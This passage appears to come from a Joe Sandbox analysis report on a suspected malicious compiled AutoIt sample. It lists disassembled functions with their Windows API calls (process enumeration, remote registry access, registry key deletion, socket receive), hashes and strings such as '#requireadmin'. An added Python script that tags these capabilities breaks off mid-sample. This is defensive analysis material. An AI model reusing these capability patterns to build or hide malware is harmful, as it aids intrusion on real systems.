                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: 40221f1e31eaa154a3638d51a575910e4602b86424a95258918b69a71af22e65
                                                              • Instruction ID: 5f63b66ecdf702e8f710a7ce3a05f76518be8505a1cd875a9bd715675b4ff6e1
                                                              • Opcode Fuzzy Hash: 40221f1e31eaa154a3638d51a575910e4602b86424a95258918b69a71af22e65
                                                              • Instruction Fuzzy Hash: 925109A25047D93DFF3683B4CC55B7ABFA96F06300F088988F2D5564C2D694EE89D760
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _wcsncpy$LocalTime
                                                              • String ID:
                                                              • API String ID: 2945705084-0
                                                              • Opcode ID: b836096edb4b2207e80aaaef69508ea2d1aa5455e810829f7b752fb1ac2a9fda
                                                              • Instruction ID: f39e9ac164f8f57ce8e3bba9295fd8fe41cc6cc5b23194f37b6459f2f523334a
                                                              • Opcode Fuzzy Hash: b836096edb4b2207e80aaaef69508ea2d1aa5455e810829f7b752fb1ac2a9fda
                                                              • Instruction Fuzzy Hash: 00417E66C20218B6CB10EBF4CC46ADFB3ACAF14710F548967F506E3221FA34E624C3A5
                                                              APIs
                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00B13DA1
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B13DCB
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00B13E80
                                                                • Part of subcall function 00B13D72: RegCloseKey.ADVAPI32(?), ref: 00B13DE8
                                                                • Part of subcall function 00B13D72: FreeLibrary.KERNEL32(?), ref: 00B13E3A
                                                                • Part of subcall function 00B13D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B13E5D
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B13E25
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                              • String ID:
                                                              • API String ID: 395352322-0
                                                              • Opcode ID: 7908d7c5139c5451202eb044dd40903c87cc108a11f9282e5f0393c8662b5cb0
                                                              • Instruction ID: 734e75e301cac13530f5f3d0c4adc25086428349e05c51727c071b42ca8dcc4a
                                                              • Opcode Fuzzy Hash: 7908d7c5139c5451202eb044dd40903c87cc108a11f9282e5f0393c8662b5cb0
                                                              • Instruction Fuzzy Hash: 3D31EDB2901209BFDB159B94EC85AFFB7FCEF08710F5001A9E512E2150EA749F859BB0
                                                              APIs
                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B18FE7
                                                              • GetWindowLongW.USER32(00C8D590,000000F0), ref: 00B1901A
                                                              • GetWindowLongW.USER32(00C8D590,000000F0), ref: 00B1904F
                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B19081
                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B190AB
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00B190BC
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B190D6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$MessageSend
                                                              • String ID:
                                                              • API String ID: 2178440468-0
                                                              • Opcode ID: 3bffe92c1db199ccba216efc65aaa3403ed9270e1faee3edb8dfc267614c0ce1
                                                              • Instruction ID: 738e6ee6d2467cbdcc73a34563a036d311996ed63a1eef921c4315df11c4944b
                                                              • Opcode Fuzzy Hash: 3bffe92c1db199ccba216efc65aaa3403ed9270e1faee3edb8dfc267614c0ce1
                                                              • Instruction Fuzzy Hash: BF313334640254EFDB218F58EC99FA837E5FB4A714F6401A8F5198B2B1CB72E880CF50
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AF08F2
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AF0918
                                                              • SysAllocString.OLEAUT32(00000000), ref: 00AF091B
                                                              • SysAllocString.OLEAUT32(?), ref: 00AF0939
                                                              • SysFreeString.OLEAUT32(?), ref: 00AF0942
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00AF0967
                                                              • SysAllocString.OLEAUT32(?), ref: 00AF0975
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: 2652302ad41d454abbf605aef7b18f228edad739ff13fb6ecf1578f813ed423a
                                                              • Instruction ID: a7b36a39399e5e27a421c0ad96a7162d56962645b9d3014121c9ae838af712f6
                                                              • Opcode Fuzzy Hash: 2652302ad41d454abbf605aef7b18f228edad739ff13fb6ecf1578f813ed423a
                                                              • Instruction Fuzzy Hash: F121797660121DAF9B109FB8DC84DBF77ECEB09360B508525FA15DB252EAB0EC45C7A0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                              • API String ID: 1038674560-2734436370
                                                              • Opcode ID: 72b5a9731019a07cf0f1fb2a6a7cea47bac78955d8d046c80a807f57bfdcab75
                                                              • Instruction ID: 90181263e5ecebc83979893427ba24d67279c4babbbc036062f4a708bafe54ed
                                                              • Opcode Fuzzy Hash: 72b5a9731019a07cf0f1fb2a6a7cea47bac78955d8d046c80a807f57bfdcab75
                                                              • Instruction Fuzzy Hash: 48216B3224421977D730EBB49D12FBB73E8EF65314F10803AF64797182E7999A42D3A5
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AF09CB
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AF09F1
                                                              • SysAllocString.OLEAUT32(00000000), ref: 00AF09F4
                                                              • SysAllocString.OLEAUT32 ref: 00AF0A15
                                                              • SysFreeString.OLEAUT32 ref: 00AF0A1E
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00AF0A38
                                                              • SysAllocString.OLEAUT32(?), ref: 00AF0A46
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: f9f942e28b0dc0c1668f25a3b4f2200332a4b93d0a891e72c0a6cb8e2e87165e
                                                              • Instruction ID: 7e3edfb4ca495ab233ca6b5a29a9c9a958d6995ac6d40e4305470cf708238ff8
                                                              • Opcode Fuzzy Hash: f9f942e28b0dc0c1668f25a3b4f2200332a4b93d0a891e72c0a6cb8e2e87165e
                                                              • Instruction Fuzzy Hash: 34215875604208AFDB10EFF8DC89DBA77EDEF093607508125FA19CB265EA70EC418754
                                                              APIs
                                                                • Part of subcall function 00ACD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00ACD1BA
                                                                • Part of subcall function 00ACD17C: GetStockObject.GDI32(00000011), ref: 00ACD1CE
                                                                • Part of subcall function 00ACD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ACD1D8
                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B1A32D
                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B1A33A
                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B1A345
                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B1A354
                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B1A360
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                              • String ID: Msctls_Progress32
                                                              • API String ID: 1025951953-3636473452
                                                              • Opcode ID: a4596d3bdd7c299ed08ea9ea93a4429c838a38f5fa640909aa94400246ac349a
                                                              • Instruction ID: 7a0501868fa1134b5c0a2faa8574cfb93a1afb54458cdc17156446c784cc6928
                                                              • Opcode Fuzzy Hash: a4596d3bdd7c299ed08ea9ea93a4429c838a38f5fa640909aa94400246ac349a
                                                              • Instruction Fuzzy Hash: 9D11B6B1150119BEEF115FA4DC85EEB7F6DFF08798F014114FA18A60A0C772AC61DBA4
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 00ACCCF6
                                                              • GetWindowRect.USER32(?,?), ref: 00ACCD37
                                                              • ScreenToClient.USER32(?,?), ref: 00ACCD5F
                                                              • GetClientRect.USER32(?,?), ref: 00ACCE8C
                                                              • GetWindowRect.USER32(?,?), ref: 00ACCEA5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Rect$Client$Window$Screen
                                                              • String ID:
                                                              • API String ID: 1296646539-0
                                                              • Opcode ID: b1f2f49333c5414f7cb8b0349b7f103e805c86a6188fcfabd5a7bfaa193c8c2a
                                                              • Instruction ID: b76916655703b52140fe82c2c0aa615ddec6bfeeeb8f95d9e651d63bec85e708
                                                              • Opcode Fuzzy Hash: b1f2f49333c5414f7cb8b0349b7f103e805c86a6188fcfabd5a7bfaa193c8c2a
                                                              • Instruction Fuzzy Hash: A7B15A79900249DBDF10CFA9C481BEEBBB1FF08310F159569EC69EB250DB30A951CB64
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00B11C18
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00B11C26
                                                              • __wsplitpath.LIBCMT ref: 00B11C54
                                                                • Part of subcall function 00AD1DFC: __wsplitpath_helper.LIBCMT ref: 00AD1E3C
                                                              • _wcscat.LIBCMT ref: 00B11C69
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00B11CDF
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00B11CF1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                              • String ID:
                                                              • API String ID: 1380811348-0
                                                              • Opcode ID: 7132ec059101f3b3775926f126982a21a02c94ccce60d34fcb9938163978138d
                                                              • Instruction ID: 72e2f0ab3aa70eeea3c80a037cce39ed2d5dba4b302979723fbf65030f77d384
                                                              • Opcode Fuzzy Hash: 7132ec059101f3b3775926f126982a21a02c94ccce60d34fcb9938163978138d
                                                              • Instruction Fuzzy Hash: AC515C715043409BD720EF24D985FABB7ECEF88754F00496EF58697292EB70DA44CB92
                                                              APIs
                                                                • Part of subcall function 00B13C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B12BB5,?,?), ref: 00B13C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B130AF
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B130EF
                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B13112
                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B1313B
                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B1317E
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00B1318B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                              • String ID:
                                                              • API String ID: 3451389628-0
                                                              • Opcode ID: 9c74132370d35b093b57708e025934654fe88e486a9c09e1df0ddfaec17ceec2
                                                              • Instruction ID: 674b85265da0b18089d1ca24405a65cbee0390ed1ec0077f5742f28b83006d55
                                                              • Opcode Fuzzy Hash: 9c74132370d35b093b57708e025934654fe88e486a9c09e1df0ddfaec17ceec2
                                                              • Instruction Fuzzy Hash: 9D518631208300AFC704EF64CA95EAEBBE9FF88710F44485DF555972A2EB31EA45CB52
                                                              APIs
                                                              • GetMenu.USER32(?), ref: 00B18540
                                                              • GetMenuItemCount.USER32(00000000), ref: 00B18577
                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B1859F
                                                              • GetMenuItemID.USER32(?,?), ref: 00B1860E
                                                              • GetSubMenu.USER32(?,?), ref: 00B1861C
                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00B1866D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountMessagePostString
                                                              • String ID:
                                                              • API String ID: 650687236-0
                                                              • Opcode ID: 6179f221f8121343a59803ed8740431e54e6d7f8d78e7c8bcf9c8c1c7de19615
                                                              • Instruction ID: b9f76828dec2d2fbb876788b5f017951bea655c9ef5b786d351b39c9bf17a50a
                                                              • Opcode Fuzzy Hash: 6179f221f8121343a59803ed8740431e54e6d7f8d78e7c8bcf9c8c1c7de19615
                                                              • Instruction Fuzzy Hash: F5518C75A00219AFCB11EFA4CA85AEEB7F5FF48310F154499E915BB351DF30AE818B90
                                                              APIs
                                                              • _memset.LIBCMT ref: 00AF4B10
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF4B5B
                                                              • IsMenu.USER32(00000000), ref: 00AF4B7B
                                                              • CreatePopupMenu.USER32 ref: 00AF4BAF
                                                              • GetMenuItemCount.USER32(000000FF), ref: 00AF4C0D
                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00AF4C3E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                              • String ID:
                                                              • API String ID: 3311875123-0
                                                              • Opcode ID: e8c72719d0c15fbc931e2f311896146e8c0c49f290c566f9c14c67f8e1936b65
                                                              • Instruction ID: 89b550095b25f90245421590efab204ab29bee93f300e38ad60ed3f0d34618f6
                                                              • Opcode Fuzzy Hash: e8c72719d0c15fbc931e2f311896146e8c0c49f290c566f9c14c67f8e1936b65
                                                              • Instruction Fuzzy Hash: 9851AD7060120DEBDF20CFA8D988BBFBBF4AF48318F144159F6659B291D7709945CB51
                                                              APIs
                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00B4DC00), ref: 00B08E7C
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00B08E89
                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00B08EAD
                                                              • #16.WSOCK32(?,?,00000000,00000000), ref: 00B08EC5
                                                              • _strlen.LIBCMT ref: 00B08EF7
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00B08F6A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_strlenselect
                                                              • String ID:
                                                              • API String ID: 2217125717-0
                                                              • Opcode ID: 14ea0bf62613ff7de54605951f750f0488a304d30821be6d995a080c9062a925
                                                              • Instruction ID: 744799d0ddc4a48a611424a16bb7238ffd970dc72092afc924af5520f03f3325
                                                              • Opcode Fuzzy Hash: 14ea0bf62613ff7de54605951f750f0488a304d30821be6d995a080c9062a925
                                                              • Instruction Fuzzy Hash: 27418071500205ABCB14EBA4CE85EEEBBBDEF48310F104699F55A972D2DF30AE40CB60
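The three records above for process enumeration (CreateToolhelp32Snapshot / Process32FirstW / Process32NextW), registry enumeration (RegConnectRegistryW / RegOpenKeyExW / RegEnumValueW) and socket receive (select / __WSAFDIsSet / WSOCK32 ordinal #16, which is recv) are the kind of API clusters an analyst wants pulled out of a report of this size automatically rather than by scrolling. The Python below is an added example and is not part of the Joe Sandbox report or its tooling: it parses the IDA-plugin record format shown on this page (the "APIs" list, the "Part of subcall function" lines, and the Similarity / Opcode ID bullets) and tags each function with a capability. The sample text is constructed from the three records above with most metadata bullets dropped; the tag names and matching rules are the example's own. One caveat: because the report flags the binary as a compiled AutoIt script, clusters like these also occur in the AutoIt runtime's built-in functions, so a tag records that the capability is present in the dumped code, not that it was used maliciously.

```python
"""Parse Joe Sandbox IDA-plugin function records and tag API capabilities.
Added example for this report page, not Joe Sandbox code; the tag names and
matching rules are the example's own."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall
# function ADDR:"; the argument list and the comma are optional in the report.
API_RE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# Metadata bullets such as "• Opcode ID: ..." or "• API String ID: ...".
FIELD_RE = re.compile(r"^\s*[•*-]\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str
    subcall_of: Optional[str]  # callee address for "Part of subcall" lines

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

def parse_records(text: str) -> List[FunctionRecord]:
    """One record per 'APIs' block; other bullets become scalar fields."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
        elif current is None:
            continue
        elif (m := API_RE.match(line)):
            current.calls.append(ApiCall(m["name"], m["module"], m["args"] or "",
                                         m["ref"].upper(), m["sub"]))
        elif (m := FIELD_RE.match(line)) and m["key"] != "Associated":
            current.fields[m["key"]] = m["val"]
    return records

def tag_capabilities(rec: FunctionRecord) -> Set[str]:
    """Map an API cluster to a capability; presence, not proof of intent."""
    names = {c.name.lower() for c in rec.calls}
    by_mod = {(c.name.lower(), c.module.upper()) for c in rec.calls}
    tags: Set[str] = set()
    # Toolhelp snapshot plus a walk of the process list.
    if "createtoolhelp32snapshot" in names and names & {
            "process32first", "process32firstw", "process32next", "process32nextw"}:
        tags.add("process-enumeration")
    reg = {n for n, m in by_mod if m == "ADVAPI32" and n.startswith("reg")}
    if reg & {"regenumvaluew", "regenumvaluea", "regenumkeyexw", "regenumkeyexa",
              "regqueryvalueexw", "regqueryvalueexa"}:
        tags.add("registry-read")
    if reg & {"regconnectregistryw", "regconnectregistrya"}:
        tags.add("remote-registry")  # RegConnectRegistry can target another host
    # WSOCK32 exports by ordinal: #16 is recv, #17 is recvfrom.
    sock = {n for n, m in by_mod if m == "WSOCK32"}
    if sock & {"#16", "#17", "recv", "recvfrom"}:
        tags.add("socket-receive")
    if "readfile" in names:
        tags.add("file-read")
    return tags

def summarize(text: str) -> List[dict]:
    """Per record: truncated opcode id, tags, and the direct (non-subcall) APIs."""
    return [{"opcode_id": r.fields.get("Opcode ID", "")[:16],
             "tags": sorted(tag_capabilities(r)),
             "apis": [c.name for c in r.calls if c.subcall_of is None]}
            for r in parse_records(text)]

# Constructed sample: three records copied in shape from this report, with the
# non-essential metadata bullets dropped.
SAMPLE = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00B11C18
• Process32FirstW.KERNEL32(00000000,?), ref: 00B11C26
• __wsplitpath.LIBCMT ref: 00B11C54
  • Part of subcall function 00AD1DFC: __wsplitpath_helper.LIBCMT ref: 00AD1E3C
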